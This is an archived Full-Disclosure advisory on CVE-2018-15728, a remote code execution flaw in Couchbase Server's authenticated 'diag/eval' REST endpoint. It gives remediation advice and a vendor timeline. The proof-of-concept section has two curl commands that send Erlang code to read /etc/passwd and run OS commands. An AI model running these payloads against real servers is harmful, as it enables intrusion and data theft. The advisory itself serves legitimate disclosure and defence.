lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 23 Aug 2018 15:05:25 +1000
From: x ksi <s3810@...stk.edu.pl>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] Couchbase Server - Remote Code Execution

Hey,

Description:
Couchbase Server [1] exposes REST API [2] which by default is
available on TCP/8091 and/or TCP/18091.
Authenticated users can send arbitrary Erlang code to 'diag/eval'
endpoint of the API. The code will be subsequently executed in the
underlying operating system with privileges of the user which was used
to start Couchbase.
The 'diag/eval' endpoint was found to be referenced in the official
documentation [3][4][5], however, documentation doesn't contain any
information about the risks associated with allowing access to the
endpoint in question.
Unfortunately, I was not able to confirm which versions of Couchbase
are affected and whether 'diag/eval' endpoint is enabled by default.
You can use the PoC provided below in order to verify if your
installation is affected or not.

Proof of Concept:
1. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'case file:read_file("/etc/passwd") of {ok, B} ->
io:format("~p~n", [binary_to_term(B)]) end.'
2. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'os:cmd("env")'

Remediation:
Contact vendor for remediation guidance. Alternatively, restrict
access to the REST API and/or 'diag/eval' endpoint.

Timeline:
18.06.2018: Following vendor guidelines [6], the information about the
issue was sent to security@...chbase.com.
20.06.2018: Follow-up email was sent to the vendor to confirm receipt
of the original report.
21.08.2018: MDSec published advisory about the similar vulnerability
found in Apache CouchDB [7].
21.08.2018: CVE requested from MITRE.
22.08.2018: MITRE assigned CVE-2018-15728 for this issue.
23.08.2018: The advisory has been released.

References:
[1] https://www.couchbase.com/
[2] https://developer.couchbase.com/documentation/server/current/rest-api/rest-intro.html
[3] https://developer.couchbase.com/documentation/server/3.x/admin/Tasks/xdcr-modify-settings.html
[4] https://developer.couchbase.com/documentation/server/4.1/security/security-comm-encryption.html
[5] https://developer.couchbase.com/documentation/server/4.1/security/security-client-ssl.html
[6] https://www.couchbase.com/resources/security#VulnerabilityReporting
[7] https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/


Thanks,
Filip Palian

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ